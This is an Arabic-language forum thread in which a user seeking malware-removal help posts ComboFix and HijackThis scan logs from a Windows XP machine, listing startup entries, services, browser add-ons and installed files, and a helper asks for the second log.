2009-07-20 22:07 . 2008-04-17 14:30 -------- d-----w- c:\program files\Circle Developement
2009-07-20 22:06 . 2008-04-17 14:30 -------- d-----w- c:\program files\Messenger Plus! Live
2009-07-13 00:41 . 2008-12-23 19:56 -------- d---a-w- c:\documents and settings\All Users\Application Data\TEMP
2009-07-11 15:45 . 2008-04-16 14:27 -------- d-----w- c:\program files\Kaspersky Lab
2009-07-11 15:44 . 2008-07-30 02:47 -------- d-----w- c:\documents and settings\All Users\Application Data\Kaspersky Lab Setup Files
2009-07-03 12:48 . 2009-07-03 12:48 219664 ----a-w- c:\windows\system32\klogon.dll
2009-07-03 12:45 . 2009-07-03 12:45 27507 ----a-w- c:\windows\system32\drivers\klopp.dat
2009-07-02 16:39 . 2009-07-02 16:39 43646 ----a-r- c:\documents and settings\user\Application Data\Microsoft\Installer\{66C8C109-A1A5-4FD8-8B79-E29FCF9054FB}\_CB0D0A2532597D4C52F916.exe
2009-07-02 16:39 . 2009-07-02 16:39 43646 ----a-r- c:\documents and settings\user\Application Data\Microsoft\Installer\{66C8C109-A1A5-4FD8-8B79-E29FCF9054FB}\_286C8803C0EE77E8D7749A.exe
2009-07-02 16:39 . 2009-07-02 16:39 43646 ----a-r- c:\documents and settings\user\Application Data\Microsoft\Installer\{66C8C109-A1A5-4FD8-8B79-E29FCF9054FB}\_6FEFF9B68218417F98F549.exe
2009-07-02 16:39 . 2009-07-02 16:39 -------- d-----w- c:\program files\DaMastah
2009-06-30 03:36 . 2009-06-30 03:36 -------- d-----w- c:\program files\Acala DVD Creator
2009-06-30 03:36 . 2009-06-30 03:27 -------- d-----w- c:\documents and settings\user\Application Data\GetRightToGo
2009-06-29 15:56 . 2004-08-03 21:55 827392 ----a-w- c:\windows\system32\wininet.dll
2009-06-29 15:56 . 2004-08-03 21:55 78336 ----a-w- c:\windows\system32\ieencode.dll
2009-06-29 15:56 . 2004-08-03 21:55 17408 ----a-w- c:\windows\system32\corpol.dll
2009-06-25 01:36 . 2009-06-24 22:33 -------- d-----w- c:\program files\AutorunRemover
2009-06-16 14:53 . 2004-08-03 21:55 119808 ----a-w- c:\windows\system32\t2embed.dll
2009-06-16 14:53 . 2001-09-19 12:00 82432 ----a-w- c:\windows\system32\fontsub.dll
2009-06-15 11:01 . 2009-06-15 11:01 128016 ----a-w- c:\windows\system32\drivers\kl1.sys
2009-06-13 23:23 . 2009-06-13 23:15 -------- d-----w- c:\documents and settings\user\Application Data\Motive
2009-06-13 23:15 . 2009-06-13 23:15 -------- d-----w- c:\program files\Fahess_Activation
2009-06-13 23:15 . 2009-06-13 22:59 -------- d-----w- c:\program files\Common Files\Motive
2009-06-13 22:58 . 2009-06-13 22:58 -------- d-----w- c:\documents and settings\All Users\Application Data\Motive
2009-06-03 19:25 . 2004-08-03 21:55 1288704 ----a-w- c:\windows\system32\quartz.dll
2009-05-30 19:55 . 2009-05-27 02:57 63 ----a-w- c:\windows\AlfaStart.CMD
2009-05-16 17:59 . 2009-05-16 17:59 19472 ----a-w- c:\windows\system32\drivers\klmouflt.sys
2009-05-13 14:46 . 2009-05-13 14:46 31760 ----a-w- c:\windows\system32\drivers\klim5.sys
2008-11-13 18:09 . 2008-11-13 18:09 902 -c--a-w- c:\program files\qkzkoy.txt
2007-03-12 09:01 . 2008-11-08 23:50 66672 ----a-w- c:\program files\mozilla firefox\components\jar50.dll
2007-03-12 09:01 . 2008-11-08 23:50 54376 ----a-w- c:\program files\mozilla firefox\components\jsd3250.dll
2007-03-12 09:01 . 2008-11-08 23:50 34952 ----a-w- c:\program files\mozilla firefox\components\myspell.dll
2007-03-12 09:01 . 2008-11-08 23:50 46720 ----a-w- c:\program files\mozilla firefox\components\spellchk.dll
2007-03-12 09:01 . 2008-11-08 23:50 172144 ----a-w- c:\program files\mozilla firefox\components\xpinstal.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{f62a7166-09e8-416c-a807-03422d4cd7b4}]
2009-04-27 15:36 2088472 ----a-w- c:\program files\ppc2u\tbppc2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{f62a7166-09e8-416c-a807-03422d4cd7b4}"= "c:\program files\ppc2u\tbppc2.dll" [2009-04-27 2088472]
[HKEY_CLASSES_ROOT\clsid\{f62a7166-09e8-416c-a807-03422d4cd7b4}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2007-05-16 137752]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2007-05-16 162328]
"Persistence"="c:\windows\system32\igfxpers.exe" [2007-05-16 137752]
"SigmatelSysTrayApp"="c:\program files\SigmaTel\C-Major Audio\WDM\stsystra.exe" [2007-05-10 405504]
"Dell QuickSet"="c:\program files\Dell\QuickSet\quickset.exe" [2007-09-07 1236992]
"NeroFilterCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]
"TkBellExe"="c:\program files\Common Files\Real\Update_OB\realsched.exe" [2008-04-16 180269]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-14 39792]
"RemoteControl"="c:\program files\CyberLink\PowerDVD\PDVDServ.exe" [2005-12-07 30208]
"LanguageShortcut"="c:\program files\CyberLink\PowerDVD\Language\Language.exe" [2006-04-13 49152]
"Servsk"="c:\windows\system\NEAD.VBS" [2008-08-26 2375]
"USB Antivirus"="c:\program files\USB Disk Security\USBGuard.exe" [2008-09-23 798720]
"AVP"="c:\program files\Kaspersky Lab\Kaspersky Internet Security 2010\avp.exe" [2009-07-03 303376]
"BluetoothAuthenticationAgent"="bthprops.cpl" - c:\windows\system32\bthprops.cpl [2004-08-03 110592]
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2004-08-03 15360]
c:\documents and settings\All Users\çں‍ê، ں §ڑ\ںé ©ںê¤\ §ک ں颬نïé\
Adobe Gamma Loader.lnk - c:\program files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2008-4-17 113664]
Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2006-5-24 622653]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"NoViewOnDrive"= 0 (0x0)
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\(Default)
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Load
[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"UpdatesDisableNotify"=dword:00000001
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\KasperskyAntiVirus]
"DisableMonitoring"=dword:00000001
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\FlashFXP\\FlashFXP.exe"=
"c:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"c:\\Program Files\\Mobily Connect Card\\Mobily Connect Card.exe"=
"c:\program files\Microsoft ActiveSync\rapimgr.exe"= c:\program files\Microsoft ActiveSync\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager
"c:\program files\Microsoft ActiveSync\wcescomm.exe"= c:\program files\Microsoft ActiveSync\wcescomm.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Connection Manager
"c:\program files\Microsoft ActiveSync\WCESMgr.exe"= c:\program files\Microsoft ActiveSync\WCESMgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Application
"c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"c:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpCtr.exe"=
"c:\\AppServ\\Apache2.2\\bin\\httpd.exe"=
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"26675:TCP"= 26675:TCP:169.254.2.0/255.255.255.0:Enabled:ActiveSync Service
R0 klbg;Kaspersky Lab Boot Guard Driver;c:\windows\system32\drivers\klbg.sys [15/12/2008 08:41 م 33808]
R2 Apache2.2;Apache2.2;c:\appserv\Apache2.2\bin\httpd.exe [27/07/2006 12:49 م 20539]
R2 BandLuxe_Service;BandLuxe Service;c:\program files\BandRich\BandLuxe HSDPA Utility R11\BRService.exe [12/05/2008 02:14 م 87264]
R3 IntcHdmiAddService;Intel(R) High Definition Audio HDMI Service;c:\windows\system32\drivers\IntcHdmi.sys [15/04/2008 08:19 م 108032]
R3 klim5;Kaspersky Anti-Virus NDIS Filter;c:\windows\system32\drivers\klim5.sys [13/05/2009 05:46 م 31760]
R3 klmouflt;Kaspersky Lab KLMOUFLT;c:\windows\system32\drivers\klmouflt.sys [16/05/2009 08:59 م 19472]
S3 br3gmdm;BandLuxe 3.5G HSDPA Adapter - USB;c:\windows\system32\drivers\br3gmdm.sys [30/07/2008 06:12 م 104192]
S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [25/01/2007 08:31 م 42000]
S3 RTLWUSB;Realtek RTL8187 Wireless 802.11g 54Mbps USB 2.0 Network Adapter;c:\windows\system32\drivers\RTL8187.sys [14/04/2009 08:09 م 194304]
.
Contents of the 'Scheduled Tasks' folder
2009-08-03 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1085031214-1078081533-682003330-1003Core.job
- c:\documents and settings\user\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2009-04-29 03:52]
2009-08-05 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1085031214-1078081533-682003330-1003UA.job
- c:\documents and settings\user\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2009-04-29 03:52]
.
.
------- Supplementary Scan -------
.
uWindow Title = Microsoft Internet Explorer
mStart Page = hxxp://www.microsoft.com
mWindow Title = Microsoft Internet Explorer
IE: Send to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: أضافة إلى مانع الأعلانات - c:\program files\Kaspersky Lab\Kaspersky Internet Security 2010\ie_banner_deny.htm
IE: {{90BAE0EF-F4BF-4FAC-B2EC-2C725C34AF12} - res://c:\program files\Common Files\Justdo\IECatcher.DLL/FlashCatcher.htm
DPF: Microsoft XML Parser for Java -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

DPF: Yahoo! Pool 2 - hxxp://origin.games.yahoo.net/games/clients/y/poti_x.cab
DPF: {B7FDB0C3-4724-46D2-B8DB-6FA1DC63F7CA} - hxxp://67.228.235.164:1999/ReadUid.CAB
.
**************************************************************************
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer,
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

Rootkit scan 2009-08-06 01:45
Windows 5.1.2600 Service Pack 2 NTFS
scanning hidden processes ...
scanning hidden autostart entries ...
scanning hidden files ...
scan completed successfully
hidden files: 0
**************************************************************************
[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\mysql]
"ImagePath"="c:\appserv\MySQL\bin\mysqld-nt --defaults-file=c:\appserv\MySQL\my.ini mysql"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe,-101"
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe"
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
--------------------- DLLs Loaded Under Running Processes ---------------------
- - - - - - - > 'explorer.exe'(2080)
c:\windows\system32\WININET.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\SETUPAPI.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\btncopy.dll
c:\program files\Nokia\Nokia PC Suite 6\PhoneBrowser.dll
c:\program files\Nokia\Nokia PC Suite 6\PCSCM.dll
c:\program files\Nokia\PC Connectivity Solution\ConnAPI.DLL
c:\program files\Nokia\Nokia PC Suite 6\Lang\PhoneBrowser_ara.nlr
c:\program files\Nokia\Nokia PC Suite 6\Resource\PhoneBrowser_Nokia.ngr
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
c:\program files\Common Files\Motive\McciCMService.exe
c:\program files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
c:\appserv\MySQL\bin\mysqld-nt.exe
c:\program files\CyberLink\Shared files\RichVideo.exe
c:\program files\SigmaTel\C-Major Audio\DellXPM_5515v131\WDM\stacsv.exe
c:\windows\system32\wscntfy.exe
c:\windows\system32\msiexec.exe
c:\windows\system32\igfxsrvc.exe
c:\windows\system32\rundll32.exe
c:\windows\system32\wscript.exe
c:\program files\WIDCOMM\Bluetooth Software\BTStackServer.exe
.
**************************************************************************
.
Completion time: 2009-08-05 1:51 - machine was rebooted
ComboFix-quarantined-files.txt 2009-08-05 22:51
ComboFix2.txt 2009-05-22 20:27
Pre-Run: 14,672,764,928 bytes free
Post-Run: 17,947,942,912 bytes free
294 --- E O F --- 2009-07-30 00:37
 
تأييد 0
حمل هذا البرنامج ,,
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

شغل البرنامج ==> واضغط على
Do a system scan and save log
لحظات .. ويظهر لك تقرير داخل المفكرة ==> قم بنسخه ولصقه في ردك القاادم ,,
 
التعديل الأخير بواسطة المشرف:
توقيع : Future Tank X-1
تأييد 0
تفضل اخوي


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 07:20:12 م, on 06/08/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16876)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\SigmaTel\C-Major Audio\WDM\stsystra.exe
C:\Program Files\Dell\QuickSet\quickset.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\WINDOWS\System32\WScript.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\Program Files\USB Disk Security\USBGuard.exe
C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Microsoft ActiveSync\wcescomm.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Documents and Settings\user\Local Settings\Application Data\Google\Update\1.2.183.7\GoogleCrashHandler.exe
C:\PROGRA~1\MI3AA1~1\rapimgr.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
C:\AppServ\Apache2.2\bin\httpd.exe
C:\AppServ\Apache2.2\bin\httpd.exe
C:\Program Files\BandRich\BandLuxe HSDPA Utility R11\BRService.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Common Files\Motive\McciCMService.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\AppServ\MySQL\bin\mysqld-nt.exe
C:\Program Files\CyberLink\Shared files\RichVideo.exe
C:\Program Files\SigmaTel\C-Major Audio\DellXPM_5515v131\WDM\STacSV.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\System32\svchost.exe
C:\Documents and Settings\user\سطح المكتب\جارمن\garmin\garmin_kgen_1.5.exe
C:\Program Files\internet explorer\iexplore.exe
D:\برامج كمبيوتر\HiJackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = local
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: IEVkbdBHO - {59273AB4-E7D3-40F9-A1A8-6FA9CCA1862C} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\ievkbd.dll
O2 - BHO: مساعد تسجيل الدخول إلى Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: SnapFlash Class - {A44CBB0B-C77D-4BF5-87CC-B4EE79AD1B7E} - C:\Program Files\Common Files\Justdo\Jd2002.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.1.1309.15642\swg.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O2 - BHO: link filter bho - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\klwtbbho.dll
O2 - BHO: FlashFXP Helper for Internet Explorer - {E5A1691B-D188-4419-AD02-90002030B8EE} - C:\PROGRA~1\FlashFXP\IEFlash.dll
O2 - BHO: ppc2u Toolbar - {f62a7166-09e8-416c-a807-03422d4cd7b4} - C:\Program Files\ppc2u\tbppc2.dll
O3 - Toolbar: ppc2u Toolbar - {f62a7166-09e8-416c-a807-03422d4cd7b4} - C:\Program Files\ppc2u\tbppc2.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [SigmatelSysTrayApp] %ProgramFiles%\SigmaTel\C-Major Audio\WDM\stsystra.exe
O4 - HKLM\..\Run: [Dell QuickSet] C:\Program Files\Dell\QuickSet\quickset.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [Servsk] C:\WINDOWS\system\NEAD.VBS
O4 - HKLM\..\Run: [USB Antivirus] C:\Program Files\USB Disk Security\USBGuard.exe
O4 - HKLM\..\Run: [AVP] "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\avp.exe"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\wcescomm.exe"
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\user\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Bluetooth.lnk = ?
O4 - Global Startup: DriveGuard.lnk = C:\Program Files\WinDriveGuard\DriveGuard.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Toolbars\Restrictions present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Toolbars\Restrictions present
O8 - Extra context menu item: &تصدير إلى Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Save Flash with Flash Catcher - res://C:\Program Files\Common Files\Justdo\IECatcher.DLL/FlashCatcher.htm
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: أضافة إلى مانع الأعلانات - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\ie_banner_deny.htm
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: &Virtual keyboard - {4248FE82-7FCB-46AC-B270-339F08212110} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\klwtbbho.dll
O9 - Extra button: Flash Catcher - {90BAE0EF-F4BF-4FAC-B2EC-2C725C34AF12} - C:\Program Files\Common Files\Justdo\IECatcher.DLL
O9 - Extra 'Tools' menuitem: Flash Catcher - {90BAE0EF-F4BF-4FAC-B2EC-2C725C34AF12} - C:\Program Files\Common Files\Justdo\IECatcher.DLL
O9 - Extra button: بحث - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: URLs c&heck - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\klwtbbho.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: Yahoo! Pool 2 -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {6924091F-CD97-41E1-B1D4-D9079409D413} (IMCv1 Control) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {B7FDB0C3-4724-46D2-B8DB-6FA1DC63F7CA} (ReadUid.UserControlMacEntry) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {E001C731-5E37-4538-A5CB-8168736A2360} (Confirmation) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O18 - Filter: x-sdch - {B1759355-3EEC-4C1E-B0F1-B719FE26E377} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O20 - AppInit_DLLs: C:\PROGRA~1\KASPER~1\KASPER~2\kloehk.dll
O23 - Service: Apache2.2 - Apache Software Foundation - C:\AppServ\Apache2.2\bin\httpd.exe
O23 - Service: Kaspersky Internet Security (AVP) - Kaspersky Lab - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\avp.exe
O23 - Service: BandLuxe Service (BandLuxe_Service) - BandRich Inc. - C:\Program Files\BandRich\BandLuxe HSDPA Utility R11\BRService.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: McciCMService - Motive Communications, Inc. - C:\Program Files\Common Files\Motive\McciCMService.exe
O23 - Service: mysql - Unknown owner - C:\AppServ\MySQL\bin\mysqld-nt.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared files\RichVideo.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\Nokia\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: SigmaTel Audio Service (STacSV) - SigmaTel, Inc. - C:\Program Files\SigmaTel\C-Major Audio\DellXPM_5515v131\WDM\STacSV.exe
--
End of file - 11557 bytes
 
تأييد 0
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
عودة
أعلى